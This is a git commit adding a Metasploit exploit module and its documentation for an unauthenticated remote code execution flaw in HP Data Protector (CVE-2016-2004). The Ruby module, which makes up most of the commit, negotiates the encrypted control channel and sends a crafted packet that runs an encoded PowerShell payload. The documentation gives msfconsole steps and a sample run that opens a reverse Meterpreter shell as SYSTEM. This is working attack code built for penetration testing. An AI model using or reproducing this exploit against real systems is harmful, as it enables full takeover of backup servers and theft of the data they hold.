Land #6929, Add HP Data Protector Encrypted Comms exploit

2016-06-06 22:45:53 -05:00 · 2016-06-06 22:45:53 -05:00 · b59d10d9c4
parent d3a13f4b0c d8d6ab3ae8
commit b59d10d9c4
2 changed files with 225 additions and 0 deletions
--- a/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md
+++ b/documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md
@ -0,0 +1,75 @@
 HP Data Protector is an automated backup and recovery software for single-server to enterprise
 environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
 and Linux operating systems.
 While the server is using Encrypted Control Communication, HP Data Protector allows a remote
 attacker to gain access without authentication, and gain arbitrary code execution under the
 context of SYSTEM.
 ## Vulnerable Application
 HP Data Protector versions 7, 8, and 9 are known to be affected.
 hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
 ## Verification Steps
 **Installing HP Data Protector**
 Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
 against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
 After setting up the domain controller, double-click on the HP Data Protector installer, and you
 should see this screen:
 ![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
 Click on **Install Data Protector**. And then the installer should ask you which installation type:
 ![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
 Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
 **Enabling Encrypted Communication**
 After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
 Data Protector GUI:
 ![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
 Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
 right, click on that.
 ![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
 Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
 sure that is checked. And then click **Apply**
 **Using hp_dataprotector_encrypted_comms**
 After the encrypted communication is enabled, you are ready to use
 hp_dataprotector_encrypted_comms. Here is what you do:
 1. Start msfconsole
 2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
 3. Do: ```set RHOST [IP ADDRESS]```
 4. Do: ```set PAYLOAD [PAYLOAD NAME]```
 5. Set other options as needed
 6. Do: ```exploit```, and you should receive a session like the following:
 ```
 msf exploit(hp_dataprotector_encrypted_comms) > run
 [*] Started reverse TCP handler on 172.16.23.1:4444 
 [*] 172.16.23.173:5555 - Initiating connection
 [*] 172.16.23.173:5555 - Establishing encrypted channel
 [*] 172.16.23.173:5555 - Sending payload
 [*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
 [*] Sending stage (957999 bytes) to 172.16.23.173
 [*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 ```
--- a/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb
@ -0,0 +1,150 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'msf/core/exploit/powershell'
 require 'openssl'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP Data Protector Encrypted Communication Remote Command Execution",
      'Description'    => %q{
        This module exploits a well known remote code execution exploit after establishing encrypted
        control communications with a Data Protector agent. This allows exploitation of Data
        Protector agents that have been configured to only use encrypted control communications.
        This exploit works by executing the payload with Microsoft PowerShell so will only work
        against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows
        Server 2008 R2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jon Barg',    # Reported vuln (originally discovery?) credited by HP
          'Ian Lovering' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2016-2004' ],
          [ 'URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'WfsDelay' => 30,
          'RPORT' => 5555
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 18 2016",
      'DefaultTarget'  => 0))
  end
  def check
    # For the check command
    connect
    sock.put(rand_text_alpha_upper(64))
    response = sock.get_once(-1)
    disconnect
    if response.nil?
      return Exploit::CheckCode::Safe
    end
    service_version = Rex::Text.to_ascii(response).chop.chomp
    if service_version =~ /HP Data Protector/
      vprint_status(service_version)
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end
  def generate_dp_payload
    command = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { remove_comspec: true, encode_final_payload: true })
    payload =
      "\x32\x00\x01\x01\x01\x01\x01\x01" +
      "\x00\x01\x00\x01\x00\x01\x00\x01" +
      "\x01\x00\x20\x32\x38\x00\x5c\x70" +
      "\x65\x72\x6c\x2e\x65\x78\x65\x00" +
      "\x20\x2d\x65\x73\x79\x73\x74\x65" +
      "\x6d('#{command}')\x00"
    payload_length = [payload.length].pack('N')
    return payload_length + payload
  end
  def exploit
    # Main function
    encryption_init_data =
      "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
      "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
      "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
      "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
      "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
    print_status("Initiating connection")
    # Open connection
    connect
    # Send init data
    sock.put(encryption_init_data)
    begin
      buf = sock.get_once
    rescue ::EOFError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end
    print_status("Establishing encrypted channel")
    # Create TLS / SSL context
    sock.extend(Rex::Socket::SslTcp)
    sock.sslctx  = OpenSSL::SSL::SSLContext.new(:SSLv23)
    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    sock.sslctx.options = OpenSSL::SSL::OP_ALL
    # Enable all ciphers as older versions of Data Protector only use
    # some not enabled by default
    sock.sslctx.ciphers = "ALL"
    # Enable TLS / SSL
    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
    sock.sslsock.connect
    print_status("Sending payload")
    # Send payload
    sock.put(generate_dp_payload(), {timeout: 5})
    # Close socket
    disconnect
    print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
  end
 end